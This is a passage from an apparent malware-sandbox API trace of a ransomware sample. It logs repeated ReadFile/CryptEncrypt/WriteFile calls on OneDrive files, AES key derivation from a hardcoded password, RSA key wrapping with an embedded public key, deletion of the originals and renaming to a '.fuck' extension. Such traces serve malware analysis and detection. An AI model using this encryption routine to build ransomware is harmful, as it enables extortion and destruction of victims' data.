lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.077] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.077] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.077] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.078] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.078] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.078] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.078] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.079] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.080] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.080] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.080] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.080] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.080] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.080] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.081] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.081] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.089] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif"), bFailIfExists=0) returned 1 [0271.104] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif", dwFileAttributes=0x0) returned 1 [0271.105] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif.gsg")) returned 1 [0271.110] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif.fuck")) returned 1 [0271.112] CryptDestroyHash (hHash=0x2fa348) returned 1 [0271.112] CryptDestroyKey (hKey=0x2fa608) returned 1 [0271.112] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0271.112] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.112] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0271.112] GetLastError () returned 0x0 [0271.112] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png")) returned 0x20 [0271.114] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png", dwFileAttributes=0x80) returned 1 [0271.115] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.115] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.116] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png.gsg", dwFileAttributes=0x2) returned 1 [0271.117] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0271.119] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0271.119] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.119] CryptHashData (hHash=0x2fa948, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.119] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa948, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa348) returned 1 [0271.119] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.120] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0271.120] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f273b8) returned 1 [0271.120] CryptImportPublicKeyInfo (in: hCryptProv=0x2f273b8, dwCertEncodingType=0x1, pInfo=0x2f318d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31900*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31908*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa1c8) returned 1 [0271.120] CryptEncrypt (in: hKey=0x2fa1c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0271.120] CryptEncrypt (in: hKey=0x2fa1c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27770*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f27770*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0271.120] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f27770*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f27770*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0271.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.123] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.123] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.125] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.125] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.126] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.126] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.126] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.126] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.127] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.127] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.127] CryptEncrypt (in: hKey=0x2fa348, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.127] CryptEncrypt (in: 